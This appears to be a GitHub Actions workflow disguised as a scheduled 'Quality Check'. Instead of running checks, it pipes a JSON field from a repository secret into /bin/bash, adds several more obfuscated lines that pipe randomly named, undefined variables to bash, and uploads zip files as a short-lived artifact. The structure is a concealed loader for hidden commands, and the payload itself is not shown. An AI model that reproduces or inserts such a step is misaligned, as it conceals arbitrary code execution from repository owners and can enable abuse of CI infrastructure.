name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '55 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          a4: ${{ secrets.a4 }}
        run: |
          printf '%s' "$a4" | jq -r .n673 | /bin/bash
          echo $zjha6732 | jq -r .aqy7251 | /bin/bash
          printf '%s' "$cytef086" | jq -r .eq3 | /bin/bash
          echo $pllga5 | jq -r .hnz1289 | /bin/bash
          echo $yz7471 | jq -r .fgog387 | /bin/bash
          printf '%s' "$tq326" | jq -r .tux48 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: sKTxdusV
          path: "*.zip"
          retention-days: 1
